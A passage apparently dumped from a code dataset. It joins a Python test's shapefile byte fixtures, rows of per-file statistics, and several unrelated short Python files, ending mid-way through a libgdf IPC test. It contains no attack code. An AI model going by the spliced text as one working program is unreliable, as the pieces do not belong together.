b'5:00", "id": 24, "photo": "https://telegra.ph/test_path_photo48", "quest_1":'
b' "question47_1", "quest_2": "question47_2", "survey": "survey47", "user_name'
b'": "Name48", "video": "https://telegra.ph/test_path_video48"}, "type": "Feat'
b'ure"}, {"geometry": {"coordinates": [[[[40.0, 10.0], [-40.0, -10.0], [70.0, '
b'20.0], [40.0, 10.0]]]], "type": "MultiPolygon"}, "properties": {"ans_1": "an'
b'swer49_1", "ans_2": "answer49_2", "entr_time": "2021-11-20 22:45:00", "id": '
b'25, "photo": "https://telegra.ph/test_path_photo49", "quest_1": "question47_'
b'1", "quest_2": "question47_2", "survey": "survey47", "user_name": "Name49", '
b'"video": "https://telegra.ph/test_path_video49"}, "type": "Feature"}], "name'
b'": "Places", "type": "FeatureCollection"}')
@property
def result_shp_point(self):
return {'check': 1,
'dbf': b'\x00ID\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00USER_NAME\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00TIME'
b'\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOTO\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00ANS_2\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r 37'
b' Name50 '
b' survey50 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo50 https://telegra.ph/test_'
b'path_video50 question50_1 '
b' answer50_1 question50'
b'_2 answer50_2 '
b' 38 '
b' Name50 survey50 '
b' 20-Nov-2021 22:45:00 '
b' '
b' question50_1 '
b' answer50_1 '
b' question50_2 ans'
b'wer50_2 ',
'shp': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00N\xe8\x03\x00\x00'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x01\x00\x00\x00\n\x01\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x80F@\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x02\x00\x00\x00\n'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0',
'shx': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x002\x00\x00\x00\n\x00\x00\x00@\x00\x00\x00\n'}
@property
def result_shp_polygon(self):
return {'check': 1,
'dbf': b'\x00ID\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00USER_NAME\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00TIME'
b'\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOTO\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00ANS_2\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r 39'
b' Name51 '
b' survey50 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo51 https://telegra.ph/test_'
b'path_video51 question50_1 '
b' answer51_1 question50'
b'_2 answer51_2 '
b' 40 '
b' Name52 survey50 '
b' 20-Nov-2021 22:45:00 '
b' https://telegra.ph/test_path_photo52 '
b' https://telegra.ph/test_path_video52 question50_1 '
b' answer52_1 '
b' question50_2 ans'
b'wer52_2 ',
'shp': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xe8\x03\x00\x00'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x01\x00\x00\x008\x05\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00>@\x01\x00\x00\x00\x04\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0'
b'\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00'
b'\x00\x00>@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x02\x00\x00\x008'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00$\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x004@'
b'\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00D@\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x00D\xc0'
b'\x00\x00\x00\x00\x00\x00$\xc0\x00\x00\x00\x00\x00\x80Q@'
b'\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00\x00\x00D@\x00\x00\x00\x00'
b'\x00\x00$@',
'shx': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x002\x00\x00\x008\x00\x00\x00n\x00\x00\x008'}
@property
def result_geom_shp_point(self):
return [b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00N\xe8\x03\x00\x00\x01\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F@\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\n'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x02\x00\x00\x00\n\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0'
b'\x00\x00\x00\x00\x00\x80F\xc0',
b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00\x01\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F@\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002\x00\x00\x00\n\x00\x00\x00@'
b'\x00\x00\x00\n',
b'\x03y\x0b\x16\x02\x00\x00\x00a\x01\xf5\x01\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ID\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00USER_NAME\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00TIME\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOT'
b'O\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_2\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\r 37 Name'
b'53 survey53 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo53 https://telegra.ph/test_path_vid'
b'eo53 question53_1 answer53'
b'_1 question53_2 '
b' answer53_2 38 '
b' Name53 '
b' survey53 20-Nov-2021'
b' 22:45:00 '
b' question53_1 '
b' answer53_1 '
b' question53_2 answer53_2 '
b' ',
b'GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257'
b'223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]']
@property
def result_geom_shp_polygon(self):
return [b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\xaa\xe8\x03\x00\x00\x05\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00'
b'\x00\x80Q@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x008'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0'
b'\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00>@\x01\x00\x00\x00'
b'\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00'
b'\x00\x00>@\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0'
b'\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00'
b'\x00\x00>@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x02\x00\x00\x008'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00\x00\x00$\xc0'
b'\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x004@\x01\x00\x00\x00'
b'\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D@\x00\x00\x00\x00'
b'\x00\x00$@\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00\x00\x00$\xc0'
b'\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00'
b'\x00\x00D@\x00\x00\x00\x00\x00\x00$@',
b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00\x05\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00'
b'\x00\x80Q@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002\x00\x00\x008\x00\x00\x00n'
b'\x00\x00\x008',
b'\x03y\x0b\x16\x02\x00\x00\x00a\x01\xf5\x01\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ID\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00USER_NAME\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00TIME\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOT'
b'O\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_2\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\r 39 Name'
b'54 survey53 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo54 https://telegra.ph/test_path_vid'
b'eo54 question53_1 answer54'
b'_1 question53_2 '
b' answer54_2 40 '
b' Name55 '
b' survey53 20-Nov-2021'
b' 22:45:00 https://telegra.ph/test_path_photo55 '
b' https://telegra.ph/test_path_video55 question53_1 '
b' answer55_1 '
b' question53_2 answer55_2 '
b' ',
b'GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257'
b'223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]']
| 69.396552
| 120
| 0.390725
| 8,114
| 72,450
| 3.412127
| 0.066428
| 0.550459
| 0.66055
| 0.691324
| 0.837427
| 0.808387
| 0.790797
| 0.777252
| 0.764899
| 0.732536
| 0
| 0.248996
| 0.456977
| 72,450
| 1,044
| 121
| 69.396552
| 0.45473
| 0.001629
| 0
| 0.631743
| 0
| 0.275934
| 0.507737
| 0.234848
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074689
| false
| 0.001037
| 0.002075
| 0.073651
| 0.155602
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
424b3207336300f0a34bbc72098c2f8c131bd3c7
| 205
|
py
|
Python
|
CA117/Lab_5/stutuple_32.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 6
|
2016-02-04T00:15:20.000Z
|
2019-10-13T13:53:16.000Z
|
CA117/Lab_5/stutuple_32.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 2
|
2016-03-14T04:01:36.000Z
|
2019-10-16T12:45:34.000Z
|
CA117/Lab_5/stutuple_32.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 10
|
2016-02-09T14:38:32.000Z
|
2021-05-25T08:16:26.000Z
|
Student,show_student=__import__("collections").namedtuple("Student",["firstname","surname","id"]),lambda s:print("First name: {}\n{:>10}: {}\n{:>10}: {}".format(s.firstname,"Surname",s.surname,"ID",s.id))
| 102.5
| 204
| 0.673171
| 28
| 205
| 4.75
| 0.571429
| 0.240602
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020101
| 0.029268
| 205
| 1
| 205
| 205
| 0.648241
| 0
| 0
| 0
| 0
| 0
| 0.404878
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
429e0891ed2ca21fa2f18be7b6863cd0f9d3ad96
| 52
|
py
|
Python
|
notebooks/custom_functions.py
|
Telefonica/clipspy
|
87d1d63604a209e2271efd3d3b8df0943836a504
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/custom_functions.py
|
Telefonica/clipspy
|
87d1d63604a209e2271efd3d3b8df0943836a504
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/custom_functions.py
|
Telefonica/clipspy
|
87d1d63604a209e2271efd3d3b8df0943836a504
|
[
"BSD-3-Clause"
] | null | null | null |
import time
def get_time():
return time.time()
| 10.4
| 22
| 0.673077
| 8
| 52
| 4.25
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.211538
| 52
| 4
| 23
| 13
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
671418db26c09cf2289f4f64ba1a7ee2437086c9
| 333
|
py
|
Python
|
paperboy/config/__init__.py
|
chris-aeviator/paperboy
|
604c912c3530cd37fb07dcf22321d9dde15465ee
|
[
"Apache-2.0"
] | 233
|
2018-11-01T09:17:08.000Z
|
2022-03-22T08:27:24.000Z
|
paperboy/config/__init__.py
|
chris-aeviator/paperboy
|
604c912c3530cd37fb07dcf22321d9dde15465ee
|
[
"Apache-2.0"
] | 99
|
2018-10-17T21:48:42.000Z
|
2021-05-07T08:33:36.000Z
|
paperboy/config/__init__.py
|
chris-aeviator/paperboy
|
604c912c3530cd37fb07dcf22321d9dde15465ee
|
[
"Apache-2.0"
] | 29
|
2018-11-01T11:33:08.000Z
|
2022-01-12T22:12:19.000Z
|
from .base import * # noqa: F401, F403
from .forms import * # noqa: F401, F403
from .job import * # noqa: F401, F403
from .notebook import * # noqa: F401, F403
from .output import * # noqa: F401, F403
from .report import * # noqa: F401, F403
from .scheduler import * # noqa: F401, F403
from .user import * # noqa: F401, F403
| 37
| 44
| 0.663664
| 48
| 333
| 4.604167
| 0.270833
| 0.361991
| 0.506787
| 0.651584
| 0.696833
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183908
| 0.216216
| 333
| 8
| 45
| 41.625
| 0.662835
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6720e3dd5cd16619e6566f3c83ba08ef7e9082bb
| 68
|
py
|
Python
|
src/kfs/__main__.py
|
mattkram/kfs
|
a0dde700e05dc44acc9b523e4092e51065f57856
|
[
"MIT"
] | null | null | null |
src/kfs/__main__.py
|
mattkram/kfs
|
a0dde700e05dc44acc9b523e4092e51065f57856
|
[
"MIT"
] | 2
|
2022-01-24T04:17:38.000Z
|
2022-01-31T17:07:34.000Z
|
src/kfs/__main__.py
|
mattkram/kfs
|
a0dde700e05dc44acc9b523e4092e51065f57856
|
[
"MIT"
] | null | null | null |
from .cli import app # pragma: no cover
app() # pragma: no cover
| 17
| 40
| 0.661765
| 11
| 68
| 4.090909
| 0.636364
| 0.4
| 0.488889
| 0.711111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 68
| 3
| 41
| 22.666667
| 0.865385
| 0.485294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6720f9681d1f6035ee739a684252fd2b77079018
| 10,532
|
py
|
Python
|
python/tests/test_ipc.py
|
aschaffer/libgdf
|
dd9bc77a61098215b37f63cc8a09c3dc69cf1cb3
|
[
"Apache-2.0"
] | 1
|
2020-07-13T04:17:08.000Z
|
2020-07-13T04:17:08.000Z
|
python/tests/test_ipc.py
|
aschaffer/libgdf
|
dd9bc77a61098215b37f63cc8a09c3dc69cf1cb3
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_ipc.py
|
aschaffer/libgdf
|
dd9bc77a61098215b37f63cc8a09c3dc69cf1cb3
|
[
"Apache-2.0"
] | null | null | null |
import json
from pprint import pprint
import numpy as np
from numba import cuda
from libgdf_cffi import ffi, libgdf
expected_values = """
0,orange,0.4713545411053003
1,orange,0.003790919207527499
2,orange,0.4396940888188392
3,apple,0.5693619092183622
4,pear,0.10894215574048405
5,pear,0.09547296520000881
6,orange,0.4123169425191555
7,apple,0.4125838710498503
8,orange,0.1904218750870219
9,apple,0.9289366739893021
10,orange,0.9330387015860205
11,pear,0.46564799732291595
12,apple,0.8573176464520044
13,pear,0.21566885180419648
14,orange,0.9199361970381871
15,orange,0.9819955872277085
16,apple,0.415964752238025
17,grape,0.36941794781567516
18,apple,0.9761832273396152
19,grape,0.16672327312068824
20,orange,0.13311815129622395
21,orange,0.6230693626648358
22,pear,0.7321171864853122
23,grape,0.23106658283660853
24,pear,0.0198404248930919
25,orange,0.4032931749027482
26,grape,0.665861129515741
27,pear,0.10253071509254097
28,orange,0.15243296681892238
29,pear,0.3514868485827787
"""
def get_expected_values():
lines = filter(lambda x: x.strip(), expected_values.splitlines())
rows = [ln.split(',') for ln in lines]
return [(int(idx), name, float(weight))
for idx, name, weight in rows]
def test_ipc():
schema_bytes = b'\xa8\x01\x00\x00\x10\x00\x00\x00\x0c\x00\x0e\x00\x06\x00\x05\x00\x08\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x02\x00\x10\x00\x00\x00\x00\x00\n\x00\x08\x00\x00\x00\x04\x00\x00\x00\n\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x18\x01\x00\x00p\x00\x00\x00\x04\x00\x00\x00\x08\xff\xff\xff\x00\x00\x01\x03@\x00\x00\x00$\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00$\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x02\x00\xe8\xfe\xff\xff@\x00\x01\x00\xf0\xfe\xff\xff\x01\x00\x02\x00\x06\x00\x00\x00weight\x00\x00\x14\x00\x1e\x00\x08\x00\x06\x00\x07\x00\x0c\x00\x10\x00\x14\x00\x18\x00\x00\x00\x14\x00\x00\x00\x00\x00\x01\x05|\x00\x00\x00T\x00\x00\x00\x18\x00\x00\x00D\x00\x00\x000\x00\x00\x00\x00\x00\n\x00\x14\x00\x08\x00\x04\x00\x00\x00\n\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xff\xff\xff\x00\x00\x00\x01 \x00\x00\x00\x03\x00\x00\x000\x00\x00\x00$\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00|\xff\xff\xff\x08\x00\x01\x00\x08\x00\x08\x00\x06\x00\x00\x00\x08\x00\x00\x00\x00\x00 